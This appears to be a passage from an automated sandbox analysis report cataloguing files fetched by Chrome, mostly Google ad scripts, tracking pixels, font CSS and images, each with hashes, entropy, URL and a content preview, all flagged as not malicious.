                                                                                                                                                                                                                                                                                                                      SHA1:B08CB2310F2B4BC7EC489014E2F041A1AD7A5FBB
                                                                                                                                                                                                                                                                                                                      SHA-256:D83AFDD078C43825E5173918368CE83C62082C7D10408D0B2D788B5B60CF0E2A
                                                                                                                                                                                                                                                                                                                      SHA-512:49EA93EF9F60712DAC6610CCFDF19E48911266767F732F8B5A615326D29346B5C9E19B040E7CBBEB38A5A08DFDB76EEC86A4108C553BABD9E909245E851D619B
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=this||self;function aa(a){m.setTimeout(()=>{throw a;},0)};var ba,n;a:{for(var ca=["CLOSURE_FLAGS"],p=m,da=0;da<ca.length;da++)if(p=p[ca[da]],p==null){n=null;break a}n=p}var fa=n&&n[610401301];ba=fa!=null?fa:!1;var q;const ha=m.navigator;q=ha?ha.userAgentData||null:null;function ia(a){return ba?q?q.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function t(a){var b;a:{if(b=m.navigator)if(b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function u(){return ba?!!q&&q.brands.length>0:!1}function ja(){return u()?ia("Chromium"):(t("Chrome")||t("CriOS"))&&!(u()?0:t("Edge"))||t("Silk")};function ka(a){ka[" "](a);return a}ka[" "]=function(){};!t("Android")||ja();ja();t("Safari")&&(ja()||(u()?0:t("Coast"))||(u()?0:t("Opera"))||(u()?0:t("Edge"))||(u()?ia("Microsoft Edge"):t("Edg/"))||u()&&ia("Opera"));let la;function ma(){const a=Error();a.__closure__error__context__98438
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (53532)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):54834
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.740081137579064
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:jUyWUyt97qCrIvv4FMhrVXDI83LrarvpqJEgS5q:ty/7HrIuMf1eHgSE
                                                                                                                                                                                                                                                                                                                      MD5:269A8475DF1658DAFB5E7AF2ED64D1A0
                                                                                                                                                                                                                                                                                                                      SHA1:94BF6E3381E26A74E71107360F1B190614DB6D3E
                                                                                                                                                                                                                                                                                                                      SHA-256:2CA3554C20669BC2CE34C005878BD96932244CABEBC3D3427066C6241C5B8C4F
                                                                                                                                                                                                                                                                                                                      SHA-512:BE7E11FBE9211CD33D2764749A3ADF9BD98DCD8F5BE3AC91361CA110C008A81080E4D83D9BE9FAAD3DB53679A1549B44DCAD7DB721A030879547850E6E2EB32A
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://pagead2.googlesyndication.com/bg/LKNVTCBmm8LONMAFh4vZaTIkTKvrw9NCcGbGJBxbjE8.js
                                                                                                                                                                                                                                                                                                                      Preview://# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function a(g){return g}var Y=function(g,K,b,w,t,M,B,N,R,E,u,Z){for(Z=(E=25,w);;)try{if(E==29)break;else if(E==K)E=l.console?0:g;else if(E==48)Z=b,N=R.createPolicy(t,{createHTML:Q,createScript:Q,createScriptURL:Q}),E=g;else if(E==18)Z=w,E=K;else if(E==0)l.console[B](u.message),E=g;else{if(E==g)return Z=w,N;if(E==84)E=R&&R.createPolicy?48:64;else if(E==25)N=M,R=l.trustedTypes,E=84;else if(E==64)return N}}catch(W){if(Z==w)throw W;Z==b&&(u=W,E=18)}},l=this||self,Q=function(g){return a.call(this,g)};(0,eval)(function(g,K){return(K=Y(4,83,68,44,"bg",null,"error"))&&g.eval(K.createScript("1"))===1?function(b){return K.createScript(b)}:function(b){return""+b}}(l)(Array(Math.random()*7824|0).join("\n")+['//# sourceMappingURL=data:application/
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_nid=simplifi&google_hm=336FAC20C30146ADB0C6F6BCF75A840A&google_push=AXcoOmSsQrt-_qiBrr6OIHfpWMD-3_UYpvvZqW8G6sH9gjdwVNowHfTsgvspPMInOQti-TkQ0oB5OJiwg4bv4pExTTZs6MqwMVAtC6Uq
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):42
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.0241026136709444
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQEsJ+q:1QEsJ+q
                                                                                                                                                                                                                                                                                                                      MD5:32023BB33CFB2A1990A4EF2D85B6AC16
                                                                                                                                                                                                                                                                                                                      SHA1:23DCC6D4B5BFE00357FD0248BB5955B8E36BB8F1
                                                                                                                                                                                                                                                                                                                      SHA-256:99C2917EE5B2A01459A923BDD1C676F15EE73B62B87F696E6735312D26F51E12
                                                                                                                                                                                                                                                                                                                      SHA-512:D052ECEC2839340876EB57247CFC2E777DD7F2E868DC37CD3F3F740C8DEB94917A0C9F2A4FC8229987A0B91B04726DE2D1E9F6BCBE3F9BEF0E4B7E0D7F65EA12
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://odr.mookie1.com/t/v2/sync?tagid=V2_4531&src.visitorid=CAESEF9fyWZJ8RKws_tJ1qGsPfA&google_push=AXcoOmR4H2VfDZB2KNV09WyzX4pnuC39urG3o7HFxj9XXoEoU4DPWDgCGNwoygQN3Mr9g8i_oN8U9qlhz3zZEvnu_wfoP_GQkTanpUQ&google_cver=1
                                                                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L.;
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2586)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):22560
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.532870375696404
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:4qopQl6FtO53n+8svyfxNFo5oeHvVFBIuwRatEDTJi/EDdBC6ZcuLI4Xhw/XgsB6:4qopQlwOFn+DiFoeeFqYt2TJisnC6ZcU
                                                                                                                                                                                                                                                                                                                      MD5:975743BD0AB761EBED37DFDA7FE934E0
                                                                                                                                                                                                                                                                                                                      SHA1:2F2F01248ABA0638DCACEA2081888CF598960991
                                                                                                                                                                                                                                                                                                                      SHA-256:13F3174A49C97770522994A73451F71E77FDE2DC0E3DD7F965E73929C018888D
                                                                                                                                                                                                                                                                                                                      SHA-512:D4B8D5AA631568F43546D82324DF07B6F33112FF7A0DF1930904B2773BD7B478A05720C5CB39AB52B396559C3C8D65BC5FAB2065067DC2DBC9B72245D8ABB495
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}da("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var n=this||self;function ea(a,b,c){return a.call.apply(a.bind,arguments)}function p(a,b,c){p=ea;return p.apply(null,arguments)}function fa(a,b){function c(){}c.pr
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_nid=adkernel&google_hm=QTg4MzY5Nzg4Njc3OTM0Mzg0NjY&google_push=AXcoOmSt6_labGwG7eZ_989UtFK9wsaMAzKlKq1YttCVRXJ4tJ7NNPhWGVLSYuXx1V87z2xqKNZZQWX1Dv1IKIrsa3-8sxKvqRw_lA
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3580)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):16784
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.497019767420942
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:LQZaeg6HPkyUQJqqz1pBjL5xz9yAFxUC8rJUrWUK2FZcSX1FsS:LQZa/6vDUQJTN35xhyAsflDUKgySlFsS
                                                                                                                                                                                                                                                                                                                      MD5:DFDEDC6628AFFA8FAC2AA99A7F72586B
                                                                                                                                                                                                                                                                                                                      SHA1:475F9A991D894B488CD51D62861E29197C4F8C94
                                                                                                                                                                                                                                                                                                                      SHA-256:6A80E6F326931D8BE3BCE35187BDE97DE515207B248340C7E83EDCF4E9BA2051
                                                                                                                                                                                                                                                                                                                      SHA-512:90B14F87535EF691199DCFDDA082A51F6B000245F7FEE20EFCEC7D42C3F267678E953C024C7A57BA90B1444B32EEB105331100D7A277496FF976FF8CF34ED4FF
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var f=a[d];if(!(f in c))break a;c=c[f]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}da("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=this||self;function ea(a){m.setTimeout(()=>{throw a;},0)};var p,q;a:{for(var fa=["CLOSURE_FLAGS"],r=m,t=0;t<fa.length;t++)if(r=r[fa[t]],r==null){q=null;break
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_nid=stackadapt_usd&google_hm=_yhf8n8vXnl46QBoNdb48K3--k0&google_push=AXcoOmRtdCb-MvIoLYG0BLsM4ImCpoRrxKqAbDTAIJV5X2WKmBHF96QTkDLW4_9rU_cVAa9PlVl7JS_w5IFmJvCMk_9EQJFv2n-HLvp_
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1572)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):20471
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.584304156248125
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:192:o6sQyrXBJF3Phi+RYohDPCx+bbqGIwVjA2K6qwLdrdXQ1rsOWC3kuixejzuDkF+S:0571qYvUBMLqY0b
                                                                                                                                                                                                                                                                                                                      MD5:41004A20C7E924677BE5801EF1E6EF09
                                                                                                                                                                                                                                                                                                                      SHA1:B6E8C17BD17B38A262254E7AFD529DA3695B47E1
                                                                                                                                                                                                                                                                                                                      SHA-256:7D219CEA3316552D5927B5B7528F1192223374DD1B9DD58C48E5DE057AF6E3F1
                                                                                                                                                                                                                                                                                                                      SHA-512:3005AC96EBF9F1E876031E63282029C3B1653CC7110BBDE5C380DBCAB54BD272F6DD5C8A74D44145F8F47F175F4B3CAF6944DFE79921B7F0F333AB24D2097D38
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://fonts.googleapis.com/css?family=Google%20Sans%3A400%2C500
                                                                                                                                                                                                                                                                                                                      Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */./* armenian */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v62/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiIUvaYr.woff2) format('woff2');. unicode-range: U+0308, U+0530-058F, U+2010, U+2024, U+25CC, U+FB13-FB17;.}./* bengali */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v62/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiAUvaYr.woff2) format('woff2');. unicode-range: U+0951-0952, U+0964-0965, U+0980-09FE, U+1CD0, U+1CD2, U+1CD5-1CD6, U+1CD8, U+1CE1, U+1CEA, U+1CED, U+1CF2, U+1CF5-1CF7, U+200C-200D, U+20B9, U+25CC, U+A8F1;.}./* canadian-aboriginal */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v62/4UasrENHsxJlGDuGo1OIlJfC6l_24rl
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2775)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):93273
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.58456780007395
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:Xg80TNpmPCqiB3c+G5CSJ7FyCSzGWKZtO6Lz3FIk4K9SCeIzkDjtRbXQjzJIn+QY:XbqpmPCqU3cFTxyCSzGW7XFCeI4DjtN4
                                                                                                                                                                                                                                                                                                                      MD5:2644DCEA2BDAB8942D3BF08430F665C1
                                                                                                                                                                                                                                                                                                                      SHA1:88E8B0588F61561C82465C5F085E9E6D8C205BA0
                                                                                                                                                                                                                                                                                                                      SHA-256:A3724961B5600222B4CA071C334440649D11DC7319CBF9FC8CF27564BE868926
                                                                                                                                                                                                                                                                                                                      SHA-512:ADB3F309073879B3FB935A572CCDD25AE344F1A3A127B280E3BA9E2C4C48C2BC246B5FEB3665796FEB415E5BECE9B142B870209EF5E98948146EA6160179FB2F
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:(function(sttc){'use strict';var ca=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function da(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} .var ea=da(this),fa=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",ha={},ia={};function ja(a,b,c){if(!c||a!=null){c=ia[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ka(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in ha?f=ha:f=ea;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=fa&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?ca(ha,d,{configurable:!0,writable:!0,value:b}):b!==c&&(ia[d]===void 0&&(a=Math.random()*1E9>>>0,ia[d]=fa?ea.Symbol(d):"$jscp$"+a+"$"
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 600 x 314, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):12704
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.940138947736875
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:S0SLNpV4j/EFBFYKDBttiwzbzX9nio92AN:AtW8FjtzzbL9iqF
                                                                                                                                                                                                                                                                                                                      MD5:2D1055984E8C78EDDA088AB44B229469
                                                                                                                                                                                                                                                                                                                      SHA1:7A8405751CCDD9BF68143E1C52ECD1BE5DC84275
                                                                                                                                                                                                                                                                                                                      SHA-256:BFA18BE2B49E5A3A6C6F96754A2024F6D6536CAB05EE58EEBF473D09FE24C29D
                                                                                                                                                                                                                                                                                                                      SHA-512:D70E6875E9DED81295DCE58D0ED66859130D7E65645E8F93CB685BD08FF508D53B6C722B9421871D77BED90E1F359B37446404494062266D609C2E25022B6E28
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...X...:......l."....PLTE.l.....k..m.....j.....h.....f.....l..a..e..j..m..^.By..H~.Cwl........P........]..S..Ez.T..N..a.....G.~......_..W..\........O..Bw............v....'y.C..m....&c.%].[..........'v.X..Xw.Ah.|....(q....Br.~..[..k.......X..'X....B....|..y..l.....V..}..Zz....... .IDATx..}......4.F..../!q.BBJ.Z..............,3..+$}...~.!l^$..s.M./.8.....|..b..@.%p.!....X.'.b..@.%p.!....X.'.b..@.%p.!....X.'.b..@.%p..bi.........#.J......&Z%.~\..^..@`."9b_wBC.Kh#V.wB.e....5...V;EZ.ET............*4&....pR..@.....M.%~3..C.zv.xAP.J hA.. 8}V3.Zb.Y..*....... ....P.|..273.....# V.....</..........k........Z...$.b.n.u2m.-..=..W..!..i..X....B......._..uR..r._.Tu.o.n@.*.#W}....Y...kS.....W.u@........|^.V}........v.+P...7D .....K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (634)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):1174
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.74166936214599
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:24:hY6t2eJJBewfHDdUg8EcvjHODQMJXeK+C6uS/MLmeK+C6uSGymWAuDSXeMzCUtVv:9V4goLHODS1CTXT1CTVyPyCM6Nu
                                                                                                                                                                                                                                                                                                                      MD5:2FE2B1F17888E326B010A8CDA72D48D3
                                                                                                                                                                                                                                                                                                                      SHA1:59CBBEEDE4C472024C482BAE8529144119BBBD27
                                                                                                                                                                                                                                                                                                                      SHA-256:9A9B7FB32E01FD70747F32EFDBD0472FD681C85EEBB0C42D10C7A514820A0062
                                                                                                                                                                                                                                                                                                                      SHA-512:30BE2E73020EB97A67709E47DED40E999D352DA9B94EDD946D1315BDA65AD616AAA3CDFCFA675D061E4ED4AE1BAE3F0D245908D44411B2425C49B4345D2F6607
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://pagead2.googlesyndication.com/pagead/s/cookie_push_onload.html
                                                                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>.<html>.<head>. <title></title>. <script type="text/javascript">(function(){var f=null,g=null;function l(a){var b="";n(a,function(a){b+=String.fromCharCode(a)});return b}function n(a,b){function c(b){for(;e<a.length;){var c=a.charAt(e++),d=g[c];if(null!=d)return d;if(!/^[\s\xa0]*$/.test(c))throw Error("Unknown base64 encoding at char: "+c);}return b}p();for(var e=0;;){var d=c(-1),m=c(0),h=c(64),k=c(64);if(64===k&&-1===d)break;b(d<<2|m>>4);64!=h&&(b(m<<4&240|h>>2),64!=k&&b(h<<6&192|k))}}.function p(){if(!f){f={};g={};for(var a=0;65>a;a++)f[a]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charAt(a),g[f[a]]=a,62<=a&&(g["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.".charAt(a)]=a)}};function q(){for(var a=window.location.hash.substring(1).split(","),b=0;b<a.length;b++){var c=l(a[b]),e=window;e.google_image_requests||(e.google_image_requests=[]);var d=e.document.createElement("img");d.src=c;e.google_image_requests.push(d)}}var r=!1;
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 728 x 90, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):6903
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.777210754393487
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:96:30eNlhZHntC09e9qBRdjvmTSP4t++XrO2wXQ0RjBfv5oEIdJ+G/IGQL38l66hNyI:7NvZHtPziu4EEpPqVo52L31p2/5tig
                                                                                                                                                                                                                                                                                                                      MD5:CF4B5E15C04BB2DF72FDE2DF1C2F923D
                                                                                                                                                                                                                                                                                                                      SHA1:E59FC7341473D3FAABBFAF63EEB9CA1D188B2D13
                                                                                                                                                                                                                                                                                                                      SHA-256:2FE00C96B722401ECFA65A37FD463901DC91CCCCB4B789CE8D6EE0AA5073A2AF
                                                                                                                                                                                                                                                                                                                      SHA-512:0BD9F95865D43093D9570AAFA7147E65020CC2939733CC59FA9A68FF6127C012DEFCBA0F340E44C76CEB545A0995D9D4D8C833F026216FC188394C4ADF963609
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.......Z.............PLTE"..!.."..$.....A.0.........,..$..".....%........-..+../..!..-..#..2..)........(......../........&...........,.................3..5..S.D................0.........................&................[.L.................(........<.)......x.k.......................................>.,......7.#......$..5.!.............................9.&.........H.86.".......v.........?.,a.S..........{.....L.;...,.....).....h.[n._......L.;......C.2......A.2K.;....p._...g.X%..O.?...0....vl.[...rP.?t.f.....s-..C.2#..<.''.....E.3........y.h...G.9..z.j.....G.4.....q.^=.(...2..X.H...^.L..k.]A.......q..a.Pvvv...l.^n.`g.WR.=@.+9.&V.Ff.U\.IH.4Q.>...A.//.............yL.?...T.Ez.r..R.A3..e.OW.F...M.9t.d.....].Pt.iw.k...E.0............T.Ek.a~.p.....1.............zTXtRaw profile type APP1....m.A..0...~E......7u.HU[.....Rb+{..!X.|...o...i......2.)hP....2....zl.U.......c.s.^.=..u7.Y%A8}d.ux.H{.......*^..7 ..v..g...S......o.].....p.Q..>n
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 727 x 380, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):11489
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.928741117538931
